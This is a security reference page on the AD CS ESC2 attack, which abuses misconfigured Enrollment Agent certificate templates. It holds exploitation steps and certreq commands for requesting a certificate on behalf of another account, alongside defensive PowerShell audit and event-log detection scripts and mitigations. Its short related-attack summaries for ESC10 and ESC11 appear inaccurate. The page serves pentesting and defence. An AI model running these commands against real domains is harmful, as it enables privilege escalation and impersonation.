ESC2: Misconfigured Enrollment Agent Templates

Severity: High

ESC2 abuses misconfigured Enrollment Agent templates, allowing an attacker to request certificates on behalf of other users, potentially leading to privilege escalation and unauthorized access.

Figure: diagram illustrating the ESC2 attack vector (Enrollment Agent abuse)
Attack Details

ESC2 targets misconfigured Enrollment Agent templates, which allow certain users to request certificates on behalf of others. When these templates are not properly secured, attackers can abuse this functionality to obtain certificates for high-privileged accounts, leading to unauthorized access and potential domain compromise.

Impact
  • Unauthorized certificate issuance for other users
  • Potential privilege escalation to high-privileged accounts
  • Identity theft and impersonation
  • Bypass of multi-factor authentication
Exploitation Steps
  1. Identify vulnerable Enrollment Agent templates
  2. Use the Enrollment Agent template to request a certificate for a high-privileged account
  3. Use the obtained certificate for authentication and privilege escalation
Penetration Testing Considerations

When conducting AD CS penetration testing, consider the following aspects specific to ESC2 (Misconfigured Enrollment Agent Templates):

  • Identify vulnerable certificate templates and misconfigurations
  • Assess the potential impact on the overall AD CS security
  • Evaluate the effectiveness of existing security controls
  • Test for the ability to exploit this vulnerability in the target environment
  • Document findings and provide actionable remediation steps
Command Examples

Enumerate Enrollment Agent Templates

REM 1.3.6.1.4.1.311.20.2.1 is the Certificate Request Agent EKU; a template that lists it can issue Enrollment Agent certificates.
REM findstr only prints the matching OID line, so read the template name from the surrounding certutil output.
certutil -v -template | findstr /i "1.3.6.1.4.1.311.20.2.1"
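
The certutil one-liner above shows only that some template carries the Certificate Request Agent EKU. The following PowerShell audit script is an added example (not part of the original page or any vendor tool) that reads the same template data from the Configuration partition and reports what an ESC2 review actually needs: which templates issue Enrollment Agent certificates, who holds Enroll (or control rights that can grant it), whether any CA publishes them, and which templates accept agent-signed requests (msPKI-RA-Signature >= 1). It assumes a domain-joined host and a caller who can read the Configuration partition; the attribute names come from the AD CS schema and the GUID is the Certificate-Enrollment extended right. The "broad principal" list is a constructed starting point.

```powershell
# Added audit script (not from the original page). Assumptions: domain-joined
# host, caller can read CN=Configuration; attribute names are the AD CS schema's.
$RequestAgentOid = '1.3.6.1.4.1.311.20.2.1'                     # Certificate Request Agent EKU
$EnrollRight     = [guid]'0e10c968-78fb-11d1-a9c7-0000f80367c1' # Certificate-Enrollment extended right
$BroadPrincipals = @('Authenticated Users', 'Domain Users', 'Domain Computers', 'Users', 'Everyone')  # constructed list

$ConfigNc = [string]([ADSI]'LDAP://RootDSE').configurationNamingContext
$PkiBase  = "CN=Public Key Services,CN=Services,$ConfigNc"

function Find-Templates([string]$Filter) {
    $s = New-Object System.DirectoryServices.DirectorySearcher(
        [ADSI]"LDAP://CN=Certificate Templates,$PkiBase", $Filter)
    $s.PageSize = 500
    $s.FindAll() | ForEach-Object { $_.GetDirectoryEntry() }
}

# Principals allowed to enroll, plus those with rights that let them grant Enroll to themselves.
function Get-EnrollPrincipals($Entry) {
    foreach ($ace in $Entry.ObjectSecurity.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights  = "$($ace.ActiveDirectoryRights)"
        $enroll  = ($ace.ObjectType -eq $EnrollRight) -and ($rights -match 'ExtendedRight')
        $control = $rights -match 'GenericAll|WriteDacl|WriteOwner|WriteProperty'
        if ($enroll -or $control) { $ace.IdentityReference.Value }
    }
}

# A template that no CA publishes cannot be enrolled, so record the publishing CAs.
function Get-PublishingCAs([string]$TemplateName) {
    $s = New-Object System.DirectoryServices.DirectorySearcher(
        [ADSI]"LDAP://CN=Enrollment Services,$PkiBase",
        "(&(objectClass=pKIEnrollmentService)(certificateTemplates=$TemplateName))")
    $s.FindAll() | ForEach-Object { [string]$_.Properties['cn'][0] }
}

function Get-EnrollmentAgentAudit {
    # 1. Templates that issue Enrollment Agent certificates.
    foreach ($t in Find-Templates "(&(objectClass=pKICertificateTemplate)(pKIExtendedKeyUsage=$RequestAgentOid))") {
        $name  = [string]$t.Properties['cn'].Value
        $who   = @(Get-EnrollPrincipals $t | Sort-Object -Unique)
        $broad = @($who | Where-Object { $BroadPrincipals -contains ($_ -replace '^.*\\', '') })
        [pscustomobject]@{
            Kind        = 'IssuesAgentCert'
            Template    = $name
            PublishedOn = (Get-PublishingCAs $name) -join '; '
            Enrollers   = $who -join '; '
            Finding     = if ($broad) { "Broad enrollment: $($broad -join ', ')" } else { '' }
        }
    }
    # 2. Templates that accept requests co-signed by an agent (one or more authorized signatures).
    foreach ($t in Find-Templates '(&(objectClass=pKICertificateTemplate)(msPKI-RA-Signature>=1))') {
        $name = [string]$t.Properties['cn'].Value
        [pscustomobject]@{
            Kind        = 'AcceptsAgentSignature'
            Template    = $name
            PublishedOn = (Get-PublishingCAs $name) -join '; '
            Enrollers   = (@(Get-EnrollPrincipals $t | Sort-Object -Unique)) -join '; '
            Finding     = "Requires $($t.Properties['msPKI-RA-Signature'].Value) signature(s); " +
                          "RA application policy: $($t.Properties['msPKI-RA-Application-Policies'].Value)"
        }
    }
}

Get-EnrollmentAgentAudit | Format-Table -AutoSize -Wrap
```

Rows of kind IssuesAgentCert with a non-empty Finding are the templates to restrict first; rows of kind AcceptsAgentSignature show where an agent certificate can be spent and are the place to add manager approval or a tighter RA policy.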

Request and Use Enrollment Agent Certificate

REM Step 1: obtain an Enrollment Agent certificate from the (misconfigured) agent template.
REM EnrollmentAgentTemplate and UserTemplate are placeholder template names.
certreq -submit -attrib "CertificateTemplate:EnrollmentAgentTemplate" request.inf
REM Step 2: request a certificate for another account, signed with the agent certificate.
REM "[email protected]" is the page's obfuscated placeholder for the target account's UPN.
REM Note: certreq -submit expects a .req built from request.inf with certreq -new, and the
REM agent signature is applied with certreq -sign -cert before submission.
certreq -submit -attrib "CertificateTemplate:UserTemplate" -attrib "SAN:[email protected]" -cert EnrollmentAgentCert.pfx request.inf
Detection
  • Monitor and log all Enrollment Agent activities
  • Implement alerting for unusual certificate requests, especially for privileged accounts
  • Regularly review Enrollment Agent permissions and template configurations
Event IDs
  • 4886: Certificate Services approved a certificate request
  • 4887: Certificate Services denied a certificate request
  • 4738: A user account was changed (for monitoring Enrollment Agent changes)
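
The detection items above (alert on unusual requests, especially for privileged accounts) can be turned into a concrete check on the CA's Security log. The following PowerShell is an added example, not code from the original page: it looks at event 4887 (which Windows logs when the CA approves a request and issues the certificate) and flags every issuance where the submitting account is not the certificate subject, which is exactly what an Enrollment Agent request looks like on the CA. It assumes the EventData field names RequestId, Requester, Attributes and Subject from the Security auditing schema; the privileged-name list and the sample events are constructed.

```powershell
# Added detection example (not from the original page). Sample events below are
# constructed; field names are assumed from the Security auditing schema.
$PrivilegedNames = @('Administrator', 'krbtgt')   # constructed; extend with your tier-0 accounts

function Get-EventField([xml]$Xml, [string]$Name) {
    ($Xml.Event.EventData.Data | Where-Object { $_.GetAttribute('Name') -eq $Name }).InnerText
}

function Test-OnBehalfOfIssuance {
    param([Parameter(ValueFromPipeline)][string]$EventXml)
    process {
        $x = [xml]$EventXml
        if ([int]$x.Event.System.EventID -ne 4887) { return }
        $requester = Get-EventField $x 'Requester'      # DOMAIN\sam of the account that submitted
        $subject   = Get-EventField $x 'Subject'        # subject of the issued certificate
        $attrs     = Get-EventField $x 'Attributes'
        $requesterSam = ($requester -split '\\')[-1]
        $subjectCn    = if ($subject -match '(?i)CN=([^,]+)') { $matches[1].Trim() } else { '' }
        # Self-enrollment: requester and subject agree. Anything else was issued on behalf of someone.
        if (-not $subjectCn -or $subjectCn -eq $requesterSam) { return }
        [pscustomobject]@{
            Time      = $x.Event.System.TimeCreated.SystemTime
            RequestId = Get-EventField $x 'RequestId'
            Requester = $requester
            Subject   = $subjectCn
            Template  = if ($attrs -match 'CertificateTemplate:([^\r\n]+)') { $matches[1].Trim() } else { '' }
            Severity  = if ($PrivilegedNames -contains $subjectCn) { 'High' } else { 'Medium' }
        }
    }
}

# Constructed sample events: an agent issuing for Administrator, a normal self-enrollment,
# and an agent issuing for an ordinary user.
$SampleEvents = @(
  "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4887</EventID><TimeCreated SystemTime='2024-05-01T09:12:00Z'/></System><EventData><Data Name='RequestId'>1042</Data><Data Name='Requester'>CORP\agent-svc</Data><Data Name='Attributes'>CertificateTemplate:User</Data><Data Name='Subject'>CN=Administrator,CN=Users,DC=corp,DC=example</Data></EventData></Event>",
  "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4887</EventID><TimeCreated SystemTime='2024-05-01T09:15:00Z'/></System><EventData><Data Name='RequestId'>1043</Data><Data Name='Requester'>CORP\jdoe</Data><Data Name='Attributes'>CertificateTemplate:User</Data><Data Name='Subject'>CN=jdoe,CN=Users,DC=corp,DC=example</Data></EventData></Event>",
  "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4887</EventID><TimeCreated SystemTime='2024-05-01T09:20:00Z'/></System><EventData><Data Name='RequestId'>1044</Data><Data Name='Requester'>CORP\agent-svc</Data><Data Name='Attributes'>CertificateTemplate:User</Data><Data Name='Subject'>CN=alice,CN=Users,DC=corp,DC=example</Data></EventData></Event>"
)
$SampleEvents | Test-OnBehalfOfIssuance | Format-Table -AutoSize

# Live use on the CA (reads the real Security log instead of the samples):
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4887} | ForEach-Object { $_.ToXml() } | Test-OnBehalfOfIssuance
```

Two caveats for production use: the event carries the certificate subject but not its Subject Alternative Name, so a request whose subject is built from AD while the SAN names someone else is only visible in the CA database (certutil -view on the CA); and the check keys on the subject CN matching the sAMAccountName, which holds for the default User template but should be adapted if your templates build subjects differently.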
Mitigation and AD CS Security Best Practices

To mitigate ESC2 (Misconfigured Enrollment Agent Templates) and enhance overall AD CS security, consider implementing the following measures:

  • Review and restrict access to Enrollment Agent templates
  • Implement strict controls on who can act as an Enrollment Agent
  • Regularly audit Enrollment Agent activities
  • Use strong authentication for Enrollment Agent operations
  • Regularly conduct AD CS penetration testing to identify and address vulnerabilities
  • Implement the principle of least privilege across your AD CS infrastructure
  • Maintain up-to-date documentation of your AD CS configuration and security policies
Related AD CS Attacks

Explore other attack vectors that target Active Directory Certificate Services:

  • ESC1: Misconfigured Certificate Templates (Critical). ESC1 exploits overly permissive enrollment rights in certificate templates, allowing low-privileged users to enroll in certificates that can be used for authentication, potentially leading to privilege escalation.
  • ESC10: Rogue Certificate Authority (Critical). ESC10 involves an attacker creating a rogue Certificate Authority and adding it to the enterprise NTAuth store, potentially allowing the issuance of trusted certificates for any purpose.
  • ESC11: Vulnerable Certificate Issuance Policy (High). ESC11 exploits misconfigured certificate issuance policies, allowing attackers to obtain certificates that should be restricted, potentially leading to unauthorized access or privilege escalation.